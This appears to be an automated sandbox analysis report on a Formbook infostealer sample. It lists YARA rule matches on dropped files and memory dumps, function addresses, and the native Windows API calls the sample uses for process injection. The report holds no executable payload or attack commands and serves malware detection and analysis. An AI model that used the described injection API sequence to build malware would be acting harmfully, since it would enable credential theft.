Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6848E	0_2_00C6848E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C76CDC	0_2_00C76CDC
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C640FE	0_2_00C640FE
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C74088	0_2_00C74088
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C700B7	0_2_00C700B7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C851C9	0_2_00C851C9
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C77153	0_2_00C77153
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C762CA	0_2_00C762CA
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C632F7	0_2_00C632F7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C743BF	0_2_00C743BF
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8D440	0_2_00C8D440
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6F461	0_2_00C6F461
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6C426	0_2_00C6C426
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C777EF	0_2_00C777EF
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8D8EE	0_2_00C8D8EE
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6286B	0_2_00C6286B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C919F4	0_2_00C919F4
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6E9B7	0_2_00C6E9B7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C73E0B	0_2_00C73E0B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6EFE2	0_2_00C6EFE2
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C84F9A	0_2_00C84F9A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0227	1_2_00BD0227
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01711D55	2_2_01711D55
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01640D20	2_2_01640D20
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164F900	2_2_0164F900
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165D5E0	2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701002	2_2_01701002
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165841F	2_2_0165841F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B090	2_2_0165B090
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167EBB0	2_2_0167EBB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01666E30	2_2_01666E30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041DAE4	2_2_0041DAE4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041E544	2_2_0041E544
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041ED4C	2_2_0041ED4C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00409E5B	2_2_00409E5B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00409E60	2_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00402FB0	2_2_00402FB0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: String function: 00C7F5F0 appears 31 times
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: String function: 00C7EB78 appears 39 times
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: String function: 00C7EC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: String function: 0164B150 appears 32 times

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD043D GetTempFileNameW,NtSetInformationFile,NtWriteFile,CreateProcessInternalW,GetThreadContext,SetThreadContext,GetThreadContext,	1_2_00BD043D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD07DF NtOpenFile,	1_2_00BD07DF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689540 NtReadFile,LdrInitializeThunk,	2_2_01689540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01689910
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016895D0 NtClose,LdrInitializeThunk,	2_2_016895D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016899A0 NtCreateSection,LdrInitializeThunk,	2_2_016899A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01689860
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689840 NtDelayExecution,LdrInitializeThunk,	2_2_01689840
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016898F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_016898F0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689710 NtQueryInformationToken,LdrInitializeThunk,	2_2_01689710
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016897A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_016897A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689780 NtMapViewOfSection,LdrInitializeThunk,	2_2_01689780
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01689660
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A50 NtCreateFile,LdrInitializeThunk,	2_2_01689A50
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A20 NtResumeThread,LdrInitializeThunk,	2_2_01689A20
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01689A00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016896E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_016896E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689560 NtWriteFile,	2_2_01689560
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689950 NtQueueApcThread,	2_2_01689950
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689520 NtWaitForSingleObject,	2_2_01689520
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168AD30 NtSetContextThread,	2_2_0168AD30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016895F0 NtQueryInformationFile,	2_2_016895F0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016899D0 NtCreateProcessEx,	2_2_016899D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168B040 NtSuspendThread,	2_2_0168B040
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689820 NtEnumerateKey,	2_2_01689820
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016898A0 NtWriteVirtualMemory,	2_2_016898A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689760 NtOpenProcess,	2_2_01689760
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689770 NtSetInformationFile,	2_2_01689770
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168A770 NtOpenThread,	2_2_0168A770
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689730 NtQueryVirtualMemory,	2_2_01689730
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689B00 NtSetValueKey,	2_2_01689B00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168A710 NtOpenProcessToken,	2_2_0168A710
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689FE0 NtCreateMutant,	2_2_01689FE0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168A3B0 NtGetContextThread,	2_2_0168A3B0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689670 NtQueryInformationProcess,	2_2_01689670
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689650 NtQueryValueKey,	2_2_01689650
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689610 NtEnumerateValueKey,	2_2_01689610
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A10 NtQuerySection,	2_2_01689A10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016896D0 NtCreateKey,	2_2_016896D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A80 NtOpenDirectoryObject,	2_2_01689A80
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A360 NtCreateFile,	2_2_0041A360
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A410 NtReadFile,	2_2_0041A410
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A490 NtClose,	2_2_0041A490
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A540 NtAllocateVirtualMemory,	2_2_0041A540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A35A NtCreateFile,	2_2_0041A35A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A3B2 NtCreateFile,	2_2_0041A3B2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A40A NtReadFile,	2_2_0041A40A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A48B NtClose,	2_2_0041A48B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A53A NtAllocateVirtualMemory,	2_2_0041A53A

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C66FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00C66FAA

PE file does not import any functions

Source: F61A.tmp.1.dr

Static PE information: No import functions for PE file found

Tries to load missing DLLs

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
